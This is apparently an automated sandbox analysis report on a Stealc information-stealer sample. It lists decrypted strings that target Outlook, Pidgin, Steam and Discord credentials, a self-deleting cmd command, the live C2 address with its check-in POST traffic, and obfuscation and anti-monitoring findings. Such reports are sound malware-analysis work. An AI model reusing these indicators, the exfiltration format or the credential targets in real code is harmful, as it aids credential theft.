                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: 00000001
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: 00000002
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: 00000003
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: 00000004
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Pidgin
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \.purple\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: accounts.xml
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: token:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Software\Valve\Steam
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SteamPath
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: done
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: https
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: build
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: token
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: file
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: message
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_007C9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_007BA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_007BA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_007B72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_007BC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007C40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_007BE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007B1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007C47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007BF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007C4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007C3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_007BDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_007BBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_007BEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007BDF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49702 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 38 36 35 35 44 37 31 46 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="hwid"698655D71FEC2273848308------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="build"tale------EBAAAFBGDBKKEBGCFCBF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49744
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49952
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_007B62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 38 36 35 35 44 37 31 46 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="hwid"698655D71FEC2273848308------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="build"tale------EBAAAFBGDBKKEBGCFCBF--
                Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/.IE5
                Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/2O
                Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php#
                Source: file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php=YV
                Source: file.exe, 00000000.00000002.1319415153.00000000016BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php?
                Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZ
                Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/aO
                Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A50_2_00BFE0A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACC03C0_2_00ACC03C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C030630_2_00C03063
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F00980_2_007F0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC30000_2_00EC3000
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080B1980_2_0080B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B701980_2_00B70198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E21380_2_007E2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0824B0_2_00C0824B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081E2580_2_0081E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F42880_2_007F4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082D39E0_2_0082D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083B3080_2_0083B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C813150_2_00C81315
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B064D70_2_00B064D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0D4290_2_00C0D429
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D45730_2_007D4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081D5A80_2_0081D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DE5440_2_007DE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F45A80_2_007F45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C016C50_2_00C016C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008396FD0_2_008396FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F66C80_2_007F66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082A6480_2_0082A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C067C60_2_00C067C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008267990_2_00826799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080D7200_2_0080D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0B8CA0_2_00C0B8CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080B8A80_2_0080B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008098B80_2_008098B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081F8D60_2_0081F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4883B0_2_00B4883B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008048680_2_00804868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00820B880_2_00820B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00824BA80_2_00824BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00818BD90_2_00818BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B09BDE0_2_00B09BDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4B4E0_2_00BB4B4E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082AC280_2_0082AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C09C6B0_2_00C09C6B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1D780_2_007E1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5AD980_2_00B5AD98
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00805DB90_2_00805DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00804DC80_2_00804DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B75D2A0_2_00B75D2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1BD150_2_00B1BD15
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFAD0E0_2_00BFAD0E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081AD380_2_0081AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080BD680_2_0080BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F8E780_2_007F8E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00821EE80_2_00821EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B68ED90_2_00B68ED9
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 007B4610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: lolfhxxi ZLIB complexity 0.994913422527048
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_007C9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_007C3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\OX1A1DLO.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2095104 > 1048576
                Source: file.exeStatic PE information: Raw size of lolfhxxi is bigger than: 0x100000 < 0x194600
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.7b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lolfhxxi:EW;swlqukzj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lolfhxxi:EW;swlqukzj:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007C9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x2040e8 should be: 0x2032cf
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: lolfhxxi
                Source: file.exeStatic PE information: section name: swlqukzj
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9EFB2 push edx; mov dword ptr [esp], ebp0_2_00A9F062
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9EFB2 push 14007003h; mov dword ptr [esp], edx0_2_00A9F06A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9EFB2 push 1270E709h; mov dword ptr [esp], esi0_2_00A9F072
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD50D8 push ecx; mov dword ptr [esp], 7EF691CEh0_2_00CD50FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD50D8 push 19F96B7Ch; mov dword ptr [esp], ebp0_2_00CD51E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push edi; mov dword ptr [esp], 6F8FB557h0_2_00BFE0AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], edi0_2_00BFE0E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], ebx0_2_00BFE0ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push edi; mov dword ptr [esp], esp0_2_00BFE132
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], 4AAF583Ch0_2_00BFE194
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push 125DE493h; mov dword ptr [esp], esi0_2_00BFE1B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push ebp; mov dword ptr [esp], ebx0_2_00BFE293
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push ebp; mov dword ptr [esp], edx0_2_00BFE356
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], eax0_2_00BFE46F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], 7EEE1290h0_2_00BFE473
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push 10D1BF57h; mov dword ptr [esp], eax0_2_00BFE50E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push ebp; mov dword ptr [esp], ecx0_2_00BFE5E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push 415528C0h; mov dword ptr [esp], esi0_2_00BFE5F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], edi0_2_00BFE67F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], 3248D001h0_2_00BFE697
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push 59B54900h; mov dword ptr [esp], esp0_2_00BFE6A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push ebx; mov dword ptr [esp], edi0_2_00BFE6C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push edi; mov dword ptr [esp], edx0_2_00BFE702
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push 03E74006h; mov dword ptr [esp], edx0_2_00BFE714
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push ecx; mov dword ptr [esp], 07B6B7D8h0_2_00BFE73D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push 667103DBh; mov dword ptr [esp], ebx0_2_00BFE7D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], 6F7F77E1h0_2_00BFE807
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], edi0_2_00BFE825
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], ecx0_2_00BFE829
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push 55723D11h; mov dword ptr [esp], ecx0_2_00BFE831
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], 5AF6E9C6h0_2_00BFE885
                Source: file.exeStatic PE information: section name: lolfhxxi entropy: 7.954139609313276

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
